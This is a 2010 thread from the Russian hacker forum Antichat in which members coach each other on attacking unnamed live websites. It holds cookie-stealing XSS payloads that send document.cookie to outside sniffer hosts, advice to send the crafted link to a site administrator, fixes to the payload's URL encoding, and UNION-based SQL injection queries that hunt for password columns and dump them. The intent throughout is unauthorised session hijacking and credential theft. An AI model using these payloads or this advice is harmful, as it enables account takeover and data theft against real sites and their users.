ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
11.07.2010, 15:35
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555
Репутация:
226
|
|
Сообщение от Konqi
Konqi said:
не знаю как вы но я никогда не использовал программы чтобы найти или автоматически раскрутить скул,
от этого одни минусы
1. вы не осваиваете sql инъекцию хорошо
2. вы доверяете программу которая может ошибиться
3. и этот взлом даже не можете считать вашим (это чистое мнение)
однажды я раскрутил скул до паролей, походу было два запроса и поэтому немного потрудилась над колонками..
потом скул даль программу
havij
которая считается крутой тулзой,и программа не смог раскрутить скул
sql инъекции бывают такими разными что программно раскрутить все это не реально(я так думаю)
вообщем дело ваше, простите за оффтоп(если это оффтоп)
когда тебе нужно просмотреть кучу баз и кучу таблиц, то ручками ты потеряешь довольно много времени, ну а если это можно сделать программно, то зачем же его терять? если программно не получилось, то тогда да, нужно уже руками делать
|
|
|
11.07.2010, 15:38
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от Seravin
Seravin said:
когда тебе нужно просмотреть кучу баз и кучу таблиц, то ручками ты потеряешь довольно много времени, ну а если это можно сделать программно, то зачем же его терять? если программно не получилось, то тогда да, нужно уже руками делать
Естественно, когда уже скуль найдена и вывод есть, то дампить или выводить данные можно программно - лично я так и делаю. А искать вручную.
|
|
|
|
11.07.2010, 17:53
|
|
Участник форума
Регистрация: 29.11.2007
Сообщений: 116
Провел на форуме:
283596
Репутация:
88
|
|
Верно, согласен, ищешь для начала в ручную, потому как проги далеко не все жрут и находят, а пот дампить 200к записей в ручную, это абсолютно не реально, а вот если только пасс накопать, тогда понятно, можно и ручками.
Сори за оффтоп
|
|
|
|
11.07.2010, 22:12
|
|
Новичок
Регистрация: 30.05.2010
Сообщений: 25
Провел на форуме:
67694
Репутация:
5
|
|
Глуповатый вопрос. Например, нашел я пару пассивных хссок на одном сайте... Что дальше? Нужно взять где-то исходники сниффера и поставить их на каком-нибудь хосте, или можно воспользоваться античатовским сниффером? Какой код надо сунуть в урл, чтобы куки отправлялись на сниффер?
Не пинайте только)
/thread20140.html - это читал, но не нашел (или не понял) ответа(( |
|
|
|
11.07.2010, 22:34
|
|
Познающий
Регистрация: 18.10.2009
Сообщений: 80
Провел на форуме:
1180165
Репутация:
11
|
|
Сообщение от Boa
Boa said:
Глуповатый вопрос. Например, нашел я пару пассивных хссок на одном сайте... Что дальше?
Если на сайте с авторизацией, то сунуть админу, если нет - забить.
Сообщение от Boa
Boa said:
Нужно взять где-то исходники сниффера и поставить их на каком-нибудь хосте, или можно воспользоваться античатовским сниффером?
Ачатовский не пашет, есть другие, но можно поставить свой. Можешь поискать сниф от Kanick'a _http://www.kanick.ru/sniffer/
Сообщение от Boa
Boa said:
Какой код надо сунуть в урл, чтобы куки отправлялись на сниффер?
Не пинайте только)
/thread20140.html
- это читал, но не нашел (или не понял) ответа(( Почитай еще, там есть ответ на твой последний вопрос..
Сообщение от None
###Как его подставить к ссылке с Xss?
Да очень легко...
Есть несколко вариантов:
- 1)делаем вот так:
http://*****.ru/free?p='>img=new Image();img.src="http://antichat.org/s/HakNet.gif?"+document.cookie;"+document.cookie;
где **** сайт с Xss.
Вот сам составленый скрипт:
'>img = new Image();img.src="http://antichat.org/s/HakNet.gif?"+document.cookie;
- 2)Можно ещё делать вот так:
http://*****.ru/free?p='>
где обращаетса к http://haknet.h16.ru/script/js.js
а в js.js есть:
img=new Image();img.src="http://antichat.org/s/HakNet.gif?"+document.cookie;
этот способ более надёжен.
|
|
|
|
11.07.2010, 23:11
|
|
Новичок
Регистрация: 30.05.2010
Сообщений: 25
Провел на форуме:
67694
Репутация:
5
|
|
Сообщение от None
Если на сайте с авторизацией, то сунуть админу, если нет - забить.
Есть)
Сообщение от None
Ачатовский не пашет, есть другие, но можно поставить свой. Можешь поискать сниф от Kanick'a _http://www.kanick.ru/sniffer/
Персонал-версию скачал, поставил на хосте, конфиг оставил как есть. Попробовал дать залогиненному юзеру ссылку с
Код:
Code:
img=new Image();img.src="http://*****.ru/sniffer/i.gif?"+document.cookie;"+document.cookie;
, и ссылку с
Код:
Code:
img=new Image();img.src="http://*****.ru/sniffer/s.gif?"+document.cookie;"+document.cookie;
, т.к. не знаю, адрес какой картинки подставлять) Но на сниффер ничего не пришло. Или я совсем туплю и нужно указывать адрес вовсе не к картинке? Запутался.
|
|
|
|
11.07.2010, 23:26
|
|
Познающий
Регистрация: 18.10.2009
Сообщений: 80
Провел на форуме:
1180165
Репутация:
11
|
|
2Boa
качай делюкс _ссылка самоуничтожится через 5 минут
+ надо немного подправить конф ($sniffer_path = "http://sniffer_path/")
+ там есть немного фака
имхо, но лучше так
http://*****.ru/free?p='>
где обращаетса к http://haknet.h16.ru/script/js.js
а в js.js есть:
img=new Image();img.src="http://antichat.org/s/HakNet.gif?"+document.cookie;
этот способ более надёжен.
ПС
сылка должнa быть не на нартинку (i.gif) а на скрипт(s.gif)
|
|
|
|
11.07.2010, 23:47
|
|
Новичок
Регистрация: 30.05.2010
Сообщений: 25
Провел на форуме:
67694
Репутация:
5
|
|
Код:
Code:
http://******.ru/archive.php?year=img=new Image();img.src="http://******.ru/sniffer/s.gif?"+document.cookie;"+document.cookie;
Что тут неправильно?( Путь в конфиге прописал.
Второй вариант трудоемок, а у меня два ночи) попробую потом. |
|
|
|
12.07.2010, 00:01
|
|
Новичок
Регистрация: 04.12.2005
Сообщений: 6
Провел на форуме:
27773
Репутация:
1
|
|
Сообщение от Dare
Dare said:
Decoy
хм... пробуй такой запрос site.com/fail.php?id=-1+union+select
+GROUP_CONCAT(concat_ws(0x3a,table_schema,TABLE_NA ME)+SEPARATOR+0x3C62723E)+from+information_schema. columns+where+column_name+like+0x257061737325+or+c olumn_name+like+0x25702577256425--+
Далее из полученных таблиц выводи имена колонок:
site.com/fail.php?id=-1+union+select
+GROUP_CONCAT(column_name)+SEPARATOR+0x3C62723E)+f rom+information_schema.columns+where+table_name=з ахексенное.имя.таблицы--+
получаешь имена колонок, и:
site.com/fail.php?id=-1+union+select
+concat_ws(0x3a,имена необходимых колонок)+from+iимя.таблицы--+ (если не будет вывода через точку имя_базы.имя_таблицы)
ЗЫ: +(пробел) перед коментариями не нужен) =) всего)
Привет!
Спасибо за ответ! Первый запрос не отработал - результат тот же (долгая загрузка, пустая страница).
Интересное наблюдение:
Код:
Code:
http://example.com/detail.php?id=-1+union+select+1,2,3,4,5+from+information_schema.user_privileges--+
работает, а
Код:
Code:
http://example.com/detail.php?id=-1+union+select+1,2,3,4,5+from+information_schema.tables--+
нет.
Получается, смотреть некоторые таблицы из INFORMATION_SCHEMA удается, другие - нет. Причем не сильно похоже на разграничение доступа, в противном случае была бы ошибка.
|
|
|
|
12.07.2010, 00:08
|
|
Guest
Сообщений: n/a
Провел на форуме:
54576
Репутация:
8
|
|
Сообщение от Boa
Boa said:
Код:
Code:
http://******.ru/archive.php?year=img=new Image();img.src="http://******.ru/sniffer/s.gif?"+document.cookie;"+document.cookie;
Что тут неправильно?( Путь в конфиге прописал.
Второй вариант трудоемок, а у меня два ночи) попробую потом.
Сообщение от None
img=new Image();
Пробел видишь ? Там после передачи будет стоять %20
А выглядеть он будет так :
Сообщение от None
img=new%20Image();
Чтобы там был пробел после передачи надо поставить +.
это во первых, а во вторых везде где стоять + замени их на %2b,после передачи там автоматически будет стоять +,если не поставишь %2b там будет стоять пробел
Вот например:
Код:
Code:
http://*.ru/archive.php?year=img=new+Image();img.src="http://*.ru/sniffer/s.gif?"%2bdocument.cookie;"
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
